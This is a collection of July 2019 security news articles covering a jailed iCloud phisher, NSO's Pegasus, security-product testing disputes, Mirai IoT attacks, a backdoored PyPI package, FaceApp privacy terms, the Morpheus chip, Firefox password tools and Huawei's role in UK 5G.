STE WILLIAMS

A man from the US state of Georgia who pleaded guilty in March to breaking into the Apple iCloud accounts of sports and entertainment figures was sentenced on Thursday to three years and one month in federal prison – and ordered to pay almost $700,000 in restitution.

Kwamaine Jerell Ford was indicted in April, 2018, at the age of 27, for six counts each of wire fraud, computer fraud, access device fraud, and aggravated identity theft. He pleaded guilty earlier this year to a single count of computer fraud and a single count of aggravated identity theft.

Ford faced charges for hacking into more than 100 Apple iCloud accounts of professional athletes and rappers using a phishing scheme.

‘More creative and more devious’

“In today’s high tech world, citizens entrust their personal information to a number of service providers and expect that information to be protected,” said Chris Hacker, the aptly named Special Agent in Charge of FBI Atlanta, in a statement. “Unfortunately, identity thieves are becoming more creative and more devious.”

Ford’s scheme, which spanned the period from March 2015 to March 2018, was not particularly creative nor devious, but it worked well enough. It involved duping the people into believing that he was an Apple support representative so they would reveal their iCloud account passwords and the answers to their security questions.

According to the indictment filed against him, Ford conducted his phishing attack using email addresses like [email protected] and [email protected] to fool people into thinking his messages had been sent from a legitimate Apple address.

Scam

USA.com is an insecure (HTTP) website that offers a search engine for local business information. The site, however, does not control email affiliated with the domain, which is administered by email service provider Mail.com, as USA.com notes on its scam warning page.

Though this warning pre-dates Ford’s scheme, the indictment against him makes clear that Ford’s victims failed to see anything wrong with messages from the USA.com domain.

“Using these spoof email accounts, Ford sent emails to victims containing misrepresentations about the status of their iCloud accounts, including false claims that the account had been locked or that a user was attempting to share a video file, and requested that the victims provide login credentials, including the account password or the answers to iForgot security questions,” the complaint.

It notes that Ford also sometimes called victims on the phone pretending to be an Apple employee in order to obtain personal information.

Celebgate latest: Fourth dirtbag ‘fesses up to pillaging iCloud for stars’ X-rated selfies

READ MORE

Once he had obtained the login credentials of victims’ iCloud accounts, Ford would access them and reset the passwords so he would have sole control. Thereafter, he was able to use credit cards associated with the accounts to make purchases and transfer funds to other accounts under his control.

The court documents do not make clear whether the credit card numbers obtained were stored in files accessible through iCloud or were stored by Apple as an iCloud payment method. Nor do the documents, at least those available to the public, specify the names of the victims, characterized by US Attorney Byung Pak as “celebrities” involved in sports and music.

In any event, Ford used the stolen credit card numbers to spend $322,567 over a three-year period, on flights, car travel, hotels, retail goods, restaurants, and cash transfers to his online financial accounts, according to the US Attorney’s Office of the Northern District of Georgia.

In a similar case dating back to 2014 that involved computer abuse but not identity theft charges, four hackers broke into the iCloud accounts of celebrities and obtained nude pictures that they then posted on Reddit and 4Chan, an incident referred to as Celebgate. Between 2016 and 2018, the four men involved – Ryan Collins, Edward Majerczyk, Emilio Herrera, and George Garofano – pleaded guilty and received sentences ranging from 8 months to 18 months. ®

Sponsored:
Balancing consumerization and corporate control

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/07/19/hacker_icloud_jailed_thee_years/

Israeli spyware firm NSO Group has denied it developed malware that can steal user data from cloud services run by Amazon, Apple, Facebook, Google and Microsoft.

The Financial Times reported this morning that NSO’s Pegasus malware, which was previously known to be capable of slurping data from a phone handset, “has now evolved to capture the much greater trove of information stored beyond the phone, in the cloud, such as a full history of a target’s location data, archived messages or photo”.

This means it can access iCloud and Google Drive backups. It was suggested by the FT that linked cloud accounts accessed through apps on the target device are also vulnerable to this style of full-take surveillance, based on sales pitch documents shown, among other places, to the Ugandan government.

The Pink ‘Un reported that Pegasus is now capable of copying authentication keys of services including Google Drive, Facebook Messenger and iCloud from an infected device, “allowing a separate server to impersonate the phone, including its location”. The NSO sales document boasted this allowed spies operating the malware to bypass multi-factor authentification and access control warning emails.

Most concerningly, the firm allegedly claimed that its access remained persistent even when the malware was removed from the target device.

NSO Group was previously linked to the infamous “WhatsApp calls can pwn your mobe” malware discovered and patched earlier this year. The business’s Pegasus malware was patched in 2016 by Apple after it was learned that they also affected desktop versions of Safari and OSX. A year later, however, a coalition of Mexican and Canadian investigators uncovered sustained efforts by the Mexican government to use Pegasus for spying on local dissidents.

Mitigating this kind of attack ought to be a straightforward matter of resetting passwords and access tokens once the malware is cleansed from the infected device. Indeed, the FT mentions that this workaround was referenced in one of the pitch documents it had seen.

The Israeli company told The Reg: “There is a fundamental misunderstanding of NSO, its services and technology. NSO’s products do not provide the type of collection capabilities and access to cloud applications, services, or infrastructure, as listed and suggested in today’s FT article.

“Increasingly sophisticated terrorists and criminals are taking advantage of encrypted technologies to plan and conceal their crimes, leaving intelligence and law enforcement agencies in the dark and putting public safety and national security at risk. NSO’s lawful interception products are designed to confront this challenge.

“Our products are licensed in small scale to legitimate government intelligence and law enforcement agencies for the sole purpose of preventing or investigating serious crime including terrorism.” ®

Sponsored:
Balancing consumerization and corporate control

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/07/19/nso_group_malware_cloud_report/

Why apples-to-apples performance tests are the only way to accurately gauge the impact of network security products and solutions.

When a company is researching options for network security tools, it needs to be able to weigh a number of factors, including cost, effectiveness, compatibility, integration with current or third-party tools and platforms, and — perhaps most important — impact on network performance. To evaluate all options, however, there has to be some way to compare different solutions accurately. The recent legal conflict between CrowdStrike and NSS Labs illustrates why it is such a challenge for organizations to evaluate different vendors and products.

NSS Labs and CrowdStrike announced in late May that after two years, they had reached a confidential settlement to end their legal battle. CrowdStrike initially sued NSS Labs in February 2017 over negative test results that were published in an NSS Labs endpoint protection report. NSS Labs gave the CrowdStrike Falcon platform a “Caution” rating. CrowdStrike, however, maintained that the test was faulty. In late 2018, NSS Labs fought back with a lawsuit of its own against CrowdStrike, Symantec, ESET, and the Anti-Malware Testing Standards Organization (AMTSO), claiming that the vendors and AMTSO conspired to prevent NSS Labs from testing their products.

Following the settlement, NSS Labs retracted its 2017 assessment of CrowdStrike’s Falcon platform and issued a corrective statement, saying that “NSS’s testing of the CrowdStrike Falcon platform was incomplete and the product was not properly configured with prevention capabilities enabled. In addition to the results having already been acknowledged as partially incomplete, we now acknowledge they are not accurate and confirm that they do not meet our standards for publication.”

The CrowdStrike-NSS altercation is only one legal battle between a testing lab and a vendor. The NSS Labs lawsuit against Symantec, ESET, and AMTSO is still ongoing, even in the wake of the settlement with CrowdStrike, and it is likely that similar lawsuits are in the pipeline.

What’s Wrong with Network Security Testing
The situation involving NSS Labs and CrowdStrike is a perfect example of what’s wrong with network security testing. In a Dark Reading column earlier this year, I described network security testing as the Wild West, noting that proprietary testing methods conducted under uniquely optimized conditions create a chaotic scenario in which everyone plays by their own rules and customers are left struggling to sort it all out.

The fact that NSS Labs retracted its rating of CrowdStrike’s Falcon platform highlights one of the primary issues with closed or proprietary network security testing standards. Without visibility into the testing protocols and standards used, there is no way for organizations to objectively determine whether an NSS Labs assessment is right or wrong.

The flip side of the coin is that closed and proprietary testing standards also create the potential for vendors to game the system or gain an advantage over rival companies. Vendors frequently impose conditions on how their products can be tested and demand that testing labs design environments and tests that focus on areas in which the product excels, minimizing scenarios in which the product does not perform well.

In the end, however, whether the testing lab makes a mistake or misconfigures the product, or whether the vendor influences the testing unfairly to make its product look better, the result is that the testing can’t be trusted. And untrustworthy testing is useless when organizations are trying to compare various products to make a purchasing decision.

The Importance of Open Security Testing Standards
Testing labs don’t want to be in the position of trying to negotiate with vendors for the privilege of testing their products, nor do they want to cave to demands that make those products look better. Vendors don’t want to have their products tested in scenarios that don’t pit them against rivals on an even playing field. Customers don’t want test results that can’t be trusted, or assessments with questionable accuracy that can’t be verified because the testing methodology is proprietary. The answer is to adopt open network security testing standards.

NetSecOPEN (like AMTSO, a vendor-led organization) was formed in 2017 to address issues and challenges related to the current proprietary testing environment. We believe that the network and security industries must go beyond simply validating test results and, instead, establish new tests that are open, transparent, and created through a cooperative, collaborative effort. Ultimately, apples-to-apples performance tests that accurately portray the effectiveness and impact of network security products on network performance are essential, and the result of such testing is a win-win-win for testing labs, vendors, and — most of all — customers.

Related Content:

• 6 Ways to Anger Attackers on Your Network
• The State of IT Operations and Cybersecurity Operations
• Taming the Wild, West World of Security Product Testing
• NSS Labs Files Antitrust Suit Against Symantec, CrowdStrike, ESET, AMTSO

 

Black Hat USA returns to Las Vegas with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier security solutions, and service providers in the Business Hall. Click for information on the conference and to register.

Brian Monkman is executive director of NetSecOPEN, a nonprofit, membership-driven organization with a goal of developing open standards for testing network security products. A 25-year network security veteran, he has extensive experience in technical support, sales … View Full Bio

Article source: https://www.darkreading.com/risk/the-problem-with-proprietary-testing-nss-labs-vs-crowdstrike/a/d-id/1335259?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

More than 30% of Mirai attacks, and an increasing number of variants of the malicious malare, are going after enterprise IoT devices, raising the stakes for business.

The groups behind Mirai and variants of the Internet of Things (IoT) device infector are increasingly targeting businesses, with nearly one-third of attacks in recent months focusing on devices commonly used inside companies, IBM’s X-Force security research group says.

Companies have encountered about twice as many attacks by variants of Mirai in 2019 versus 2018, with more than 63 device-infecting programs seen to date this year, according to IBM X-Force. Specifically, three new Mirai variants — Gafgyt, Shaolin, and Loli — target enterprise devices to drop denial-of-service or cryptomining software on the compromised systems. 

“If your organization is using IoT devices, or if you’re unsure of its use of IoT devices, you should be concerned,” says Charles DeBeck, senior cyberthreat intelligence analyst at IBM. “Threat actors are actively targeting this space and developing malware for it, which indicates not only a capability to target IoT, but also that targeting it would be profitable. This means IoT malware isn’t going away anytime soon.”

The move to attack business infrastructure is a natural evolution for the bad guys. While enterprise systems tend to be better protected, they also are connected to the Internet via higher bandwidth connections, making them more valuable to cybercriminals once compromised.

In March, Palo Alto Networks described a new version of Mirai malware that included 11 new exploits, of a total of 27, targeting WePresent presentation systems and LG Supersign TVs that are sold to businesses. 

“[T]argeting enterprise vulnerabilities allows [attackers] access to links with potentially larger bandwidth than consumer device links, affording them greater firepower for DDoS attacks,” wrote Palo Alto’s Ruchna Nigam, a senior security researcher, in an alert on the attack. 

Mirai is malware, first discovered in 2016, that infects devices not traditionally targeted by malware, such as home routers, digital video recorders, and other IoT products. The compromised devices have historically been used in massive distributed denial-of-service (DDoS) attacks that threaten businesses. Initial attacks against domain-name company Dyn and security journalist and researcher Brian Krebs used about 150,000 devices and generated more than 500 Gbps of traffic, according to Level3 Communications.

“These new attacks are alarming for their scope, impact, and the ease with which attackers employed them,” stated Dale Drew, then chief security officer of Internet provider Level 3 Communications, in prepared testimony during a hearing before two subcommittees of the US House of Representatives just two months after Mirai first appeared. “Also worrisome is that these attackers relied on just a fraction of the total available compromised IoT nodes in order to attack their victims, demonstrating the potential for significantly greater havoc from these new threats.”

Consumer devices will likely continue to be targeted because they are common and relatively insecure. In 2018, IBM saw a monthly average of 3,000 attempts to attack its customers with Mirai or Mirai-like malware. In 2019, that rate has roughly doubled. 

In addition, IBM found attackers appear to be focusing on both the insurance and information services industries, accounting for more than 80% of attacks. While these industries could be seeing more attacks because they have a larger IoT footprint compared with other industries, that seems an unlikely explanation, IBM’s DeBeck says.

“In our experience, increased levels of incidents generally indicate increased targeting, whether this targeting is intentional or unintentional,” he says. “It is unlikely the trend of increased incidents is due to greater use of IoT technology in these sectors, as these fields have no particular affinity for IoT usage.”

IoT devices tend to proliferate quickly inside companies’ environments and are a common shadow IT problem, DeBeck says. Companies need to get a handle on just how widespread the devices are, he says.

“The first step any organization needs to take is to inventory what IoT devices are in their network. Without full visibility, you can’t protect anything,” he says.

Every device should have someone responsible for managing it, including patching it regularly, monitoring it for unusual activity, and securing the device’s iteraction with other enterprise IT. 

Related Content:

• Insecure Home IoT Devices a Clear and Present Danger to Corporate Security
• New Mirai Version Targets Business IoT Devices
• Mirai Authors Escape Jail Time – But Here Are 7 Other Criminal Hackers Who Didn’t
• 7 Variants (So Far) of Mirai
• The State of IT Operations and Cybersecurity Operations 

 

Black Hat USA returns to Las Vegas with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier security solutions, and service providers in the Business Hall. Click for information on the conference and to register.

 

 

 

 

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT’s Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline … View Full Bio

Article source: https://www.darkreading.com/mirai-groups-target-business-iot-devices/d/d-id/1335308?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Catherine De Bolle is concerned law enforcement will lose its ability to track criminals with the arrival of 5G networks.

The evolution of 5G networks is causing concern for Catherine De Bolle, head of Europol, who argues that law enforcement will lose the ability to surveil criminals when 4G networks become obsolete. EU member states lack both regulations and technology to keep up, she says.

The ability to monitor criminals “is one of the most important investigative tools that police officers and services have, so we need this in the future,” she explained in an interview with Reuters, pointing to the example of a child being kidnapped.

European law enforcement officials can currently monitor and listen to criminals using mobile 4G devices, but their tools cannot be used on the 5G network, De Bolle said in an interview with Reuters. In her opinion, European law enforcement agencies should have been involved in discussions with tech firms and policymakers earlier in the transition to 5G. Now, police agencies are researching ways to minimize damage when they lack the ability to do their jobs as usual.

“The biggest risk is that we are not enough aware of the developments on a technological level and we have to be ahead on this,” De Bolle said. “We have to understand what is going on and we have to try to provide answers to it.”

She suggested Europol evolve as a platform for modernizing EU law enforcement by developing new tools and technology — a move that would require far more political and financial support than it is planned to have for the 2021–2027 budget period.

Read more details here.

 

Black Hat USA returns to Las Vegas with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier security solutions, and service providers in the Business Hall. Click for information on the conference and to register.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/threat-intelligence/europol-head-fears-5g-will-give-criminals-an-edge/d/d-id/1335309?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

A code backdoor in a package on the Python Package Index demonstrates the importance of verifying code brought in from code repositories.

The pace of modern software development requires code reuse, and effective code reuse requires code repositories. These collections of code fragments, functions, libraries, and modules allow developers to write applications without having to reinvent every small (or large) detail in their code. That makes repositories very valuable to developers – and very rich targets for malicious actors.

Researchers at ReversingLabs have discovered the most recent attack against a repository: a module that carries a backdoor found in popular Python repository Python Package Index (also known as PyPI or Cheese Shop). This isn’t the first time PyPI has been attacked, but this one is notable because it involves malicious code thought to have been previously fixed.

“Essentially, a backdoor that has been reported before but hasn’t been cleaned completely from the repository was still available and live on the Web page,” says Robert Perica, principal engineer at ReversingLabs. And while the package involved is not ubiquitous, it is being used. “What’s troubling about this package is that even though it’s not a popular package, it averages 82 installs per month,” Perica says.

The malware resides in a module named “libpeshnx,” which is similar to an earlier module named “libpeshna” and was contributed by the same author. According to ReversingLabs’ blog post on the discovery, the actual backdoor mechanism is very simple, involving a call to a command-and-control server followed by a wait to be activated.

A Supply Chain Attack
Recent years have seen an increase in the number of attacks launched against companies’ supply chains. Most of these involve physical supply chains, but Perica says security professionals need to understand these code repositories – from PyPI to RubyGems, NuGet, and npm – are critical pieces of their software supply chain. That understanding should lead to strong security procedures around code drawn from the repositories.

“Many of these software repositories don’t have such a thorough review process during user submissions,” Perica says. “Essentially, any user can more or less submit anything.”

He contrasts this with open source projects hosted on GitHub, where there is typically a review and approval process for new code added to the official release. Still, PyPI is trusted within the Python developer community. “PyPI is like the official package repository for the Python Software Foundation,” Perica notes.

He points out that PyPI hosts more than 188,000 projects, with almost 1.4 million releases and roughly 350,000 users. PyPI is almost certain to be the repository used by beginning developers, Perica adds, whether they’re working on individual projects or software for an employer.

Worst-Case Scenario
Writing secure code is complicated by the fact that modules tend to contain other modules. The “dependencies,” or network of functions and modules brought together for a single library, can be many layers deep. Perica says the best solution for companies looking to minimize the risk from code repositories is to have a security team look at each library to be used and verify the contents.

It takes a lot of effort, he says, but that effort can still be dramatically less than that required to recover from a major software vulnerability that has been exploited.

Related Content:

• The Truth About Your Software Supply Chain
• 7 Ways to Mitigate Supply Chain Attacks
• Huawei Represents Massive Supply Chain Risk: Report
• Third-Party Cyber-Risk by the Numbers
• ASUS ‘ShadowHammer’ Attack Underscores Trusted Third-Party Risks
• The State of IT Operations and Cybersecurity Operations 

 

Black Hat USA returns to Las Vegas with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier security solutions, and service providers in the Business Hall. Click for information on the conference and to register.

 

 

 

 

Curtis Franklin Jr. is Senior Editor at Dark Reading. In this role he focuses on product and technology coverage for the publication. In addition he works on audio and video programming for Dark Reading and contributes to activities at Interop ITX, Black Hat, INsecurity, and … View Full Bio

Article source: https://www.darkreading.com/application-security/malware-in-pypi-code-shows-supply-chain-risks/d/d-id/1335310?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

If you’ve been anywhere near Facebook this week, you’ve probably seen selfies of friends next to AI-generated images of what they’ll look like in a few decades. Underneath those posts, you’ll see comments from others warning them they’ve just signed over their soul to an obscure Russian company. That’s right, it’s time for another internet bogeyman. This week, its name is FaceApp.

Launched in 2017, FaceApp (which isn’t associated with Facebook) is an iOS and Android app from Russian company Wireless Lab. It lets you upload a selfie and then manipulates it for you, changing your facial expression, age, and even your gender. It’s very convincing (judging from those pictures on Facebook).

Although the app has offered an aging filter since shortly after its launch, it went viral this week after someone noticed that the company was claiming complete rights to the photos it processed. The terms and conditions are pretty Draconian:

You grant FaceApp a perpetual, irrevocable, nonexclusive, royalty-free, worldwide, fully-paid, transferable sub-licensable license to use, reproduce, modify, adapt, publish, translate, create derivative works from, distribute, publicly perform and display your User Content and any name, username or likeness provided in connection with your User Content in all media formats and channels now known or later developed, without compensation to you. When you post or otherwise share User Content on or through our Services, you understand that your User Content and any associated information (such as your username, location or profile photo) will be visible to the public.

The ‘irrevocable’ part had the internet all aflutter, and even invited Congressional scrutiny. Senator Chuck Schumer wrote to the chair of the Federal Trade Commission on Wednesday fretting about the app.

BIG: Share if you used #FaceApp:

The @FBI @FTC must look into the national security privacy risks now

Because… twitter.com/i/web/status/1…

—
Chuck Schumer (@SenSchumer) July 18, 2019

He said:

FaceApp’s location in Russia raises questions regarding how and when the company provides access to the data of US citizens to third parties, including potentially foreign governments.

Many other press reports and social media posts also raised fears about the app for the same two reasons: irrevocability, and Russia. Responding to TechCrunch, though, Wireless Lab said that FaceApp only uploads photos selected by the users for editing, and may store them in the cloud because that’s where it does its processing. It usually deletes images from its servers within 48 hours, it added. Also, it said it doesn’t send user data to Russia, but processes images on US cloud providers’ infrastructure.

An app that denies you any rights in its terms and conditions should set your alarm bells ringing. But other services’ terms, while not so aggressive, are still concerning.

For example, although Facebook says you own your content, the company can use your picture, along with data about other actions you take on Facebook, with any ads or sponsored content. The company can share your image with third parties, including unspecified service providers that support Facebook. You can end your agreement with Facebook by deleting your image, it says, although it may continue to appear if you have shared it with others and they have not deleted it.

Or check out Accuweather’s privacy policy. – the company that lost users after researchers found it sending location data. That’s because its policy lets it gather information about other devices nearby. Its terms also let it harvest your device ID and information from wearable devices like your pulse and body temperature. Your pulse and body temperature… for a weather app?

People may worry about Wireless Lab using your image for its own purposes, but as we’ve covered before, others in the West, including YouTube and IBM have already done that. An anti-privacy contract should concern you, but what’s worrying is how few people take the time to read the terms and conditions of well-known apps, no matter what country they come from.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/jyKSsHibDMY/

Researchers at the University of Michigan call it ‘Morpheus’ and it aims to make hacking so difficult at microprocessor level that attackers will give up long before they get the chance to do any damage.

It’s the sort of pitch that will strike most people as pretty sensational, which is why the engineers behind the project are disinclined to call it ‘unhackable’ even as some journalists have written about it in such exaggerated terms.

Backed by the famous US Defense Advanced Research Projects Agency (DARPA), Morpheus is a new chip architecture that sets out to counter weaknesses in today’s microprocessors, which the researchers believe make vulnerabilities and their exploits impossible to defend against.

Today’s cyberattacks typically use malware to misuse basic programming possibilities such as permissions and code injection, or to manipulate unusual states, for example memory buffer overruns (a ‘control-flow’ attack) and information leakage.

This looks like an unavoidable software problem that exploits programming possibilities, which is how today’s industry treats them when they expose and patch vulnerabilities – essentially a way of rewriting code so that an error state is no longer possible.

It’s a neverending job because new code keeps getting added, which adds new vulnerabilities, requiring new patches.

Less commented upon is that attacks also rely on making assumptions about how a microprocessor manages its own on-chip and system memory in a predictable way.

It is this complex layer that Morpheus sets out to change by encrypting and randomising or ‘churning’ data every 50ms – faster than any attacker can locate it – in effect making many common vulnerabilities impossible to exploit.

The University of Michigan’s Todd Austin often explains this to journalists using the analogy of a Rubik’s Cube:

Imagine trying to solve a Rubik’s Cube that rearranges itself every time you blink. That’s what hackers are up against with Morpheus. It makes the computer an unsolvable puzzle.

Another way of understanding it is that it’s a lower-level and more powerful version of current techniques such as Address Space Layout Randomisation (ASLR).

This ‘moving target’ defence wouldn’t make computers unhackable – Morpheus doesn’t address every type of attack – but it would at least greatly reduce the attack surface.

Side channel

The clever part is that using a Morpheus-based microprocessor would not require developers to do anything because the protections work at the hardware level.

Inevitably, there are some downsides – primarily that the extra resource management hits performance and requires physically redesigned and possibly larger microprocessors.

Nevertheless, Morpheus’s significance could be that it influences a new generation of microprocessor designs, having impressed when tested against a subset of real-world attacks.

Morpheus also has wider potential, note the researchers:

Beyond control-flow attacks, we envision that a similar approach could be adopted to protect against side-channel attacks, timing attacks, Rowhammer attacks, and even cache attacks.

Indeed, with side-channel attacks on microprocessors themselves suddenly a big worry, this might be the capability that makes Morpheus something big chip makers will grab with open arms.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/_syFEr6YYcQ/

Mozilla is expanding the privacy tools built into Firefox by integrating its Lockwise password manager directly into the browser and expanding its support for the Have I Been Pwned (HIBP) website.

Lockwise is an app for iOS and Android, and an add-on for the desktop version of Firefox. It’s a password manager designed to offer more seamless support for synchronising passwords across the three environments.

Firefox had password storage before, but Lockwise lets desktop users manage and edit their passwords and replicates the same interface across mobile devices. In Firefox 70, Mozilla will now integrate Lockwise directly into the browser.

Mozilla is also enhancing support for its front end to HIBP, which is a site operated by Australian security researcher Troy Hunt that collects lists of stolen login credentials from data breaches. It enables people to search for email addresses or passwords and lists the breaches associated with them.

Mozilla first supported Hunt’s site in September 2018 when it launched Firefox Monitor. This website was little more than a HIBP shell designed to draw more people to the service using the Mozilla name. Mozilla called it a minimum viable product and said that it would continue to improve it.

True to its word, in November 2018 it expanded the service to support multiple languages. It also added a notification in Firefox 67 that alerts desktop users when they visited a site with a recently reported data breach. And it updated Firefox Monitor with a dashboard so that people could monitor multiple email addresses.

Firefox 70 expands the in-browser Firefox Monitor notification feature to include saved logins. Users will access about:logins and see if their saved logins have been part of a data breach since they updated them.

Mozilla originally launched Firefox as a simple, fast browser, but it is gradually adding more features. Still, they are designed to enhance your privacy, and if you trust Mozilla, they might be better than using third-party add-ons that behave deceptively.

The danger of relying on third-party sites like HIBP is that ownership may change. Hunt has announced that he wants to sell the website, citing the insane amount of work it takes to operate it. However, he has vowed to maintain the integrity of HIBP and ensure that consumers can still search freely on it, regardless of who buys it.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/q-NknoPxSgU/

Excluding Huawei from the UK’s 5G network infrastructure would harm resilience and “lower security standards”, the Intelligence and Security Committee (ISC) warned today.

It also called for Britain’s next prime minister, which most think will be uncombable hair syndrome sufferer Boris Johnson, to help make a decision on the matter of the Chinese kitmaker’s inclusion so that UK networks can all move on with their plans.

“The extent of the delay is now causing serious damage to our international relationships: a decision must be made as a matter of urgency,” said the committee.

The committee released its statement on the status of 5G suppliers ahead of the government’s delayed Telecoms Supply Chain Review, which will determine whether Huawei’s gear can be included in the UK’s network infrastructure.

The supply chain review was supposed to be published “by spring 2019” and has since been put on ice until the end of August, weeks and in some cases months after the initial rollouts of 5G NSA kit by some of the UK’s networks.

Vendor consolidation in the telecoms market means just a few major players remain: Nokia, Ericsson and Huawei, ISC noted.

Limiting the field to just two, on the basis of the above arguments, would increase over-dependence and reduce competition, resulting in less resilience and lower security standards. Therefore including a third company – even if you may have some security concerns about them and will have to set a higher bar for security measures within the system – will, counterintuitively, result in higher overall security.

Both PRISM surveillance-purveyor the US and Australia have banned the company from their 5G networks, voicing concern over the nature of Huawei’s relationship with the Chinese state and therefore the potential risk of espionage or sabotage.

Spy vs spy

On the subject of intelligence-sharing between the “Five Eyes partners” – the UK, US, Canada, Australia and New Zealand have a long-standing agreement – the ISC said the United States and Australia had already been vocal in their concern that the UK might employ Huawei within its 5G network. “We should emphasise that this is not about any risk to the communication channels which are used for intelligence exchange – these would always be kept entirely separate,” it said.

“However, the National Cyber Security Centre (NCSC) … has been clear that the security of the UK’s telecommunications network is not about one company or one country: the ‘flag of origin’ for telecommunications equipment is not the critical element in determining cyber security.

“The point being made in NCSC’s statements thus far appears to be that this is not about whether or not Huawei – or indeed any company – might wish to, or be instructed to, sabotage the UK network or use it to spy on the UK. It is that the UK network has to be built in such a way that it can withstand attack from any quarter – whether that be malicious action from someone within the network, a cyber attack from actors outside, or simple human effort.”

Brexit schmexit: make a call on 5G kit, for Pete’s sake

It concluded: “In terms of the immediate issue, restricting those companies who may be involved in our 5G network will have consequences: both in terms of time and cost. And the government must weigh these, together with the security advice that any risk posed could be managed in a secure system, against the geostrategic issues outlined above.

Vodafone urges UK.gov to get on with it and conclude review into Huawei

READ MORE

“It is important to take the right decision, and take it we must: this debate has been unnecessarily protracted and this has damaged our international relationships. The new prime minister will no doubt have many issues to deal with in his first days in office.

“Nevertheless, this committee urges him to take a decision on which companies will be involved in our 5G network, so that all concerned can move forward.” ®

Sponsored:
Balancing consumerization and corporate control

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/07/19/excluding_huawei_from_5g_will_harm_security_mps_warn/